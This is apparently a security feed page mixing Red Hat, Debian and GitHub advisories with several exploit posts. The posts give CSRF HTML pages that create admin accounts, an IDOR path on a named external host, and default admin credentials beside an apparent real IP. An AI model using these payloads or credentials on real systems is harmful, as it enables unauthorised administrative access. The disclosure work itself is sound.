Red Hat Security Advisory 2024-5325-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service. Issues addressed include bypass, out of bounds read, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5325.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:5325-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5325  
Issue date:         2024-08-14  
Revision:           03  
CVE Names:          CVE-2024-7518  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

Security Fix(es):

* Firefox: 115.14/128.1 ESR ()

* mozilla: Fullscreen notification dialog can be obscured by document content (CVE-2024-7518)

* mozilla: Out of bounds memory access in graphics shared memory handling (CVE-2024-7519)

* mozilla: Type confusion in WebAssembly (CVE-2024-7520)

* mozilla: Incomplete WebAssembly exception handing (CVE-2024-7521)

* mozilla: Out of bounds read in editor component (CVE-2024-7522)

* mozilla: CSP strict-dynamic bypass using web-compatibility shims (CVE-2024-7524)

* mozilla: Missing permission check when creating a StreamFilter (CVE-2024-7525)

* mozilla: Uninitialized memory used by WebGL (CVE-2024-7526)

* mozilla: Use-after-free in JavaScript garbage collection (CVE-2024-7527)

* mozilla: Use-after-free in IndexedDB (CVE-2024-7528)

* mozilla: Document content could partially obscure security prompts (CVE-2024-7529)

* mozilla: nss: PK11_Encrypt using CKM_CHACHA20 can reveal plaintext on Intel Sandy Bridge machines (CVE-2024-7531)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-7518

References:

https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-5325-03

Red Hat Security Advisory 2024-5323-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include bypass, out of bounds read, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5323.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:5323-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5323  
Issue date:         2024-08-14  
Revision:           03  
CVE Names:          CVE-2024-7518  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

Security Fix(es):

* Firefox: 115.14/128.1 ESR ()

* mozilla: Fullscreen notification dialog can be obscured by document content (CVE-2024-7518)

* mozilla: Out of bounds memory access in graphics shared memory handling (CVE-2024-7519)

* mozilla: Type confusion in WebAssembly (CVE-2024-7520)

* mozilla: Incomplete WebAssembly exception handing (CVE-2024-7521)

* mozilla: Out of bounds read in editor component (CVE-2024-7522)

* mozilla: CSP strict-dynamic bypass using web-compatibility shims (CVE-2024-7524)

* mozilla: Missing permission check when creating a StreamFilter (CVE-2024-7525)

* mozilla: Uninitialized memory used by WebGL (CVE-2024-7526)

* mozilla: Use-after-free in JavaScript garbage collection (CVE-2024-7527)

* mozilla: Use-after-free in IndexedDB (CVE-2024-7528)

* mozilla: Document content could partially obscure security prompts (CVE-2024-7529)

* mozilla: nss: PK11_Encrypt using CKM_CHACHA20 can reveal plaintext on Intel Sandy Bridge machines (CVE-2024-7531)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-7518

References:

https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-5323-03

Kortex version 1.0 suffers from an insecure direct object reference vulnerability.

**Kortex 1.0 Insecure Direct Object Reference**

Posted Aug 14, 2024

Authored by indoushka

Kortex version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | b5387d8bfce8e3033d7413641e3e9b7894ff5bafea17fd748b642abf24fa1ae8

Download | Favorite | View

**Kortex 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Kortex v1.0 IDOR Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.mayurik.com/source-code/P5339/best-free-law-office-management-software                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /control/data-table.php[+] https://www/ahmedshawki2110.freewebhostmost.com/control/data-table.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,399)
*   Arbitrary (16,878)
*   BBS (2,859)
*   Bypass (1,863)
*   CGI (1,033)
*   Code Execution (7,813)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,082)
*   Encryption (2,389)
*   Exploit (53,197)
*   File Inclusion (4,262)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,220)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,725)
*   Python (1,641)
*   Remote (31,657)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,027)
*   Shell (3,275)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,277)
*   SQL Injection (16,610)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,987)
*   Web (9,965)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,254)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,099)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,756)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,521)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,747)
*   UNIX (9,436)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Kortex 1.0 Insecure Direct Object Reference

Debian Linux Security Advisory 5747-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5747-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
August 12, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2022-48666 CVE-2024-36484 CVE-2024-36901 CVE-2024-36938  
                 CVE-2024-39487 CVE-2024-40947 CVE-2024-41007 CVE-2024-41009  
                 CVE-2024-41012 CVE-2024-41015 CVE-2024-41017 CVE-2024-41020  
                 CVE-2024-41022 CVE-2024-41034 CVE-2024-41035 CVE-2024-41040  
                 CVE-2024-41041 CVE-2024-41044 CVE-2024-41046 CVE-2024-41049  
                 CVE-2024-41055 CVE-2024-41059 CVE-2024-41063 CVE-2024-41064  
                 CVE-2024-41065 CVE-2024-41068 CVE-2024-41070 CVE-2024-41072  
                 CVE-2024-41077 CVE-2024-41078 CVE-2024-41081 CVE-2024-41090  
                 CVE-2024-41091 CVE-2024-42101 CVE-2024-42102 CVE-2024-42104  
                 CVE-2024-42105 CVE-2024-42106 CVE-2024-42115 CVE-2024-42119  
                 CVE-2024-42120 CVE-2024-42121 CVE-2024-42124 CVE-2024-42127  
                 CVE-2024-42131 CVE-2024-42137 CVE-2024-42143 CVE-2024-42145  
                 CVE-2024-42148 CVE-2024-42152 CVE-2024-42153 CVE-2024-42154  
                 CVE-2024-42157 CVE-2024-42161 CVE-2024-42223 CVE-2024-42224  
                 CVE-2024-42229 CVE-2024-42232 CVE-2024-42236 CVE-2024-42244  
                 CVE-2024-42247

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

For the oldstable distribution (bullseye), these problems have been  
fixed in version 5.10.223-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAma6T9JfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QQdw/+OGGxmpgZNx20CbIlzd6l7HTabFLT1VJZY/mVVmWOIGkCjOoTuvL4VOFq  
vAs6vPMk7P1x+XMJ8kqzdn9+OO+cKYb6fFC6cFNMigIvTP/5w9V8Llsyn4liI8XB  
u1TmLiLA9tvJ5rfSzWsFWOgpL+swzYJznlL7jcaFIcLemZCQuCwmrB8ZF04F5LOa  
i0PIQwu8Cic1BmCSe6TZy8as6D7hCLPBQvqY+xW5u4/07ncVQ0tOrZn8uxndVM+h  
TSI35otncMsgDNXw1TQYgLyDwIUm79MbIm+P0THXr/HGXO14ehOHxvJ8MG8iXt/Q  
+YM1NlS5tqGPXPI+0dlGdwSx/a4XuPFOUQyxlj2B3xvhUD+rbTCtzamcjY0Qw4l3  
MhtkTjUZdOj9XdLyziAQs+bD0sKzuEu+Nkq2N6kl0Op2tRhge3aI9mwJK8v5CldY  
NiQS665HLwrjW+E4YT3hDl4ugnu66wBNDQMsR5x+gyQI9kK6vsm8xR123ugfPodL  
R4FXaf+DUQ0oVfOWJBcg6S3dmoaAwxUaJOCgHfTaqvatL8YOLvejeW1Vg+xCGGNg  
yKjdKA6bVzZjyTrqCEoSGkhx6MEiojHlwi8W+kLYNPssTkXgZ3p6dG6PPMMAxdwq  
ROJ+FccgiUApJNFmfbvU6x/pwaUzpbXP09a3bIFnNRSo40BxVio=  
=HNP3  
-----END PGP SIGNATURE-----

Debian Security Advisory 5747-1

Farmacia Gama version 1.0 Farmacia Gama version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Farmacia Gama v1.0 v1.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code add new admin .

[+] Go to the line 10 Set the target site link Save changes and apply . 

[+] infected file : /main.php.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Farmacia Form</title>  
</head>  
<body>  
    <h2>Farmacia User Form</h2>  
    <form action="http://127.0.0.1/farmacia-master/main.php" method="POST">  
        <label for="nome">Nome:</label>  
        <input type="text" id="nome" name="nome" required><br><br>

        <label for="cargo">Cargo:</label>  
        <input type="text" id="cargo" name="cargo" required><br><br>

        <label for="usuario">Usuário:</label>  
        <input type="text" id="usuario" name="usuario" required><br><br>

        <label for="senha">Senha:</label>  
        <input type="password" id="senha" name="senha" required><br><br>

        <button type="submit" name="acao">Submit</button>  
    </form>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Farmacia Gama 1.0 Farmacia Gama 1.0 Cross Site Request Forgery

Employees Pay Slip PDF Generator System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Employees Pay Slip PDF Generator System 1.0 CSRF Vulnerability                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/pess_0.zip                                            |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/pess/classes/Users.php?f=save", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Employees Pay Slip PDF Generator System 1.0 Cross Site Request Forgery

Bakery Shop Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Bakery Shop Management System 1.0 CSRF Vulnerability                                                                        |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_0.zip                                            |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML code :

 represents a simple user form that collects data for a user (like a username, password, and user type) and submits it to a server using AJAX.   
 Let me break down the key components of this code:

 [+] HTML Structure

    Container & Form:

          <div class="container-fluid">: This div serves as a container for the form and ensures that it will take up the full width of its parent container.  
        <form action="" id="user-form">: This form collects user data. The action attribute is empty,   
    meaning the form doesn't submit in the traditional way (it's handled via JavaScript instead).

    Hidden Input:  
        <input type="hidden" name="id" value="">: This hidden input is used to store the user ID. It might be used for editing an existing user where the user ID   
    is sent back to the server but isn't visible to the user.

[+] Form Fields:

    Full Name:

        <label for="fullname" class="control-label">Username</label>  
    <input type="text" name="fullname" id="fullname" required class="form-control form-control-sm rounded-0" value="">

    This field is actually mislabeled—the label says "Username," but the input is for the user's full name.   
  The input field is styled using Bootstrap classes.

    Username:

    <label for="username" class="control-label">Password</label>  
    <input type="text" name="username" id="username" required class="form-control form-control-sm rounded-0" value="">

[+] Similarly, this field is labeled as "Password," but the input is meant for the username. The input type should be password instead of text for security reasons.

[+] User Type:

        <label for="type" class="control-label">Type</label>  
        <select name="type" id="type" class="form-select form-select-sm rounded-0" required>  
            <option value="1">Administrator</option>  
            <option value="0">Cashier</option>  
        </select>

        This dropdown allows the user to select their type—either "Administrator" or "Cashier." The selected value (1 or 0) is sent to the server.

[+] Submit Button: 

        <button type="submit" class="btn btn-primary">Save</button>: This button submits the form. It's styled as a primary button using Bootstrap.

[+] JavaScript (jQuery)

    Form Submission Handling:  
        $(function(){ ... }): This is a jQuery shorthand for $(document).ready(), meaning the function runs after the DOM is fully loaded.  
        $('#user-form').submit(function(e){ ... }): This function handles the form submission.   
    The default form submission behavior is prevented (e.preventDefault()), meaning the form doesn't reload the page.

    Message Handling:  
        $('.pop_msg').remove();: This removes any previous pop-up messages before submitting the form.  
        _el.addClass('pop_msg'): Creates a new element for displaying messages (e.g., success or error messages).

    AJAX Request:  
        $.ajax({ ... }): Sends the form data to the server without reloading the page.  
            URL: The form is submitted to http://127.0.0.1/bsms/Actions.php?a=save_user.  
            Method: The data is sent using the POST method.  
            Data: The form data is serialized (_this.serialize()) and sent as JSON.  
            Error Handling:  
                If an error occurs, the script logs it to the console and displays an error message (which currently says "Yes Mother fucker !"  
        —this is an inappropriate message and should be corrected to something like "An error occurred.").  
            Success Handling:  
                If the submission is successful, the form is reset, a success message is shown, and the page may reload after a short delay.  
                If the submission fails, the error message from the server response is displayed.

  [+] Line 36 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="container-fluid">  
    <form action="" id="user-form">  
        <input type="hidden" name="id" value="">  
        <div class="form-group">  
            <label for="fullname" class="control-label">Username</label>  
            <input type="text" name="fullname" id="fullname" required class="form-control form-control-sm rounded-0" value="">  
        </div>  
        <div class="form-group">  
            <label for="username" class="control-label">Password</label>  
            <input type="text" name="username" id="username" required class="form-control form-control-sm rounded-0" value="">  
        </div>  
        <div class="form-group">  
            <label for="type" class="control-label">Type</label>  
            <select name="type" id="type" class="form-select form-select-sm rounded-0" required>  
                <option value="1">Administrator</option>  
                <option value="0">Cashier</option>  
            </select>  
        </div>  
        <button type="submit" class="btn btn-primary">Save</button>  
    </form>  
</div>

<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>  
<script>  
    $(function(){  
        $('#user-form').submit(function(e){  
            e.preventDefault();  
            $('.pop_msg').remove(); // Remove any previous pop-up messages

            var _this = $(this);  
            var _el = $('<div>').addClass('pop_msg');

            $('#user-form button[type="submit"]').attr('disabled', true).text('Submitting form...');

            $.ajax({  
                url: 'http://127.0.0.1/bsms/Actions.php?a=save_user',  
                method: 'POST',  
                data: _this.serialize(),  
                dataType: 'JSON',  
                error: function(err) {  
                    console.log(err);  
                    _el.addClass('alert alert-danger').text("Yes Mother fucker !");  
                    _this.prepend(_el);  
                    _el.show('slow');  
                    $('#user-form button[type="submit"]').attr('disabled', false).text('Save');  
                },  
                success: function(resp) {  
                    if (resp.status == 'success') {  
                        _el.addClass('alert alert-success').text(resp.msg);  
                        _this.prepend(_el);  
                        _el.show('slow');

                        $('#user-form').get(0).reset(); // Reset form after successful submission

                        // Optional: reload page after a short delay  
                        setTimeout(function() {  
                            location.reload();  
                        }, 2000);

                    } else {  
                        _el.addClass('alert alert-danger').text(resp.msg);  
                        _this.prepend(_el);  
                        _el.show('slow');  
                    }

                    $('#user-form button[type="submit"]').attr('disabled', false).text('Save');  
                }  
            });  
        });  
    });

  </script>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Bakery Shop Management System 1.0 Cross Site Request Forgery

Like many other SSH implementations, Apache MINA SSHD suffered from the issue that is more widely known as CVE-2023-48795. An attacker that can intercept traffic between client and server could drop certain packets from the stream, potentially causing client and server to consequently end up with a connection for which 
some security features have been downgraded or disabled, aka a Terrapin 
attack

The mitigations to prevent this type of attack were implemented in Apache MINA SSHD 2.12.0, both client and server side. Users are recommended to upgrade to at least this version. Note that both the client and the server implementation must have mitigations applied against this issue, otherwise the connection may still be affected.

**Package**

maven org.apache.sshd:sshd-common (Maven)

**Affected versions**

< 2.12.0

**Patched versions**

2.12.0

**Description**

Like many other SSH implementations, Apache MINA SSHD suffered from the issue that is more widely known as CVE-2023-48795. An attacker that can intercept traffic between client and server could drop certain packets from the stream, potentially causing client and server to consequently end up with a connection for which  
some security features have been downgraded or disabled, aka a Terrapin  
attack

The mitigations to prevent this type of attack were implemented in Apache MINA SSHD 2.12.0, both client and server side. Users are recommended to upgrade to at least this version. Note that both the client and the server implementation must have mitigations applied against this issue, otherwise the connection may still be affected.

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2024-41909
*   apache/mina-sshd#445
*   https://lists.apache.org/thread/vwf1ot8wx1njyy8n19j5j2tcnjnozt3b
*   apache/mina-sshd#449
*   apache/mina-sshd@315739e
*   apache/mina-sshd@6b0fd46
*   apache/mina-sshd@7b2c781
*   https://github.com/apache/mina-sshd/releases/tag/sshd-2.12.0

Published by the National Vulnerability Database

Aug 12, 2024

Published to the GitHub Advisory Database

Aug 12, 2024

Reviewed

Aug 12, 2024

Last updated

Aug 12, 2024

GHSA-2326-hx7g-3m9r: Apache MINA SSHD: integrity check bypass

Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server. If you are using the switch task plugin, please upgrade to version 3.2.2.

**Apache DolphinScheduler: RCE by arbitrary js execution**

High severity GitHub Reviewed Published Aug 12, 2024 to the GitHub Advisory Database • Updated Aug 12, 2024

GHSA-m9q4-p56m-mc6q: Apache DolphinScheduler: RCE by arbitrary js execution

Gaati Track version 1.0-2023 suffers from an ignored default credential vulnerability.

**Goati Track 1.0-2023 Insecure Settings**

Posted Aug 12, 2024

Authored by indoushka

Gaati Track version 1.0-2023 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | a66751e0a18c1729e99f89ffd55d400c761bad76139bca2c36b5ffb404b06d8e

Download | Favorite | View

**Goati Track 1.0-2023 Insecure Settings**

    =============================================================================================================================================| # Title     : Gaati track v1.0-2023 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  mayuri@admin.com & pass = admin[+] https://www/127.0.0.1/165.232.176.122/index.php?page=homeGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,349)
*   Arbitrary (16,870)
*   BBS (2,859)
*   Bypass (1,861)
*   CGI (1,033)
*   Code Execution (7,810)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,390)
*   DoS (25,071)
*   Encryption (2,389)
*   Exploit (53,180)
*   File Inclusion (4,262)
*   File Upload (994)
*   Firewall (822)
*   Info Disclosure (2,890)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,202)
*   Local (14,795)
*   Magazine (586)
*   Overflow (13,169)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,393)
*   Protocol (3,724)
*   Python (1,640)
*   Remote (31,655)
*   Root (3,635)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,027)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,276)
*   SQL Injection (16,609)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,967)
*   Web (9,963)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,250)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,096)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,707)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,485)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,737)
*   UNIX (9,435)
*   UnixWare (187)
*   Windows (6,672)
*   Other

Tag

#java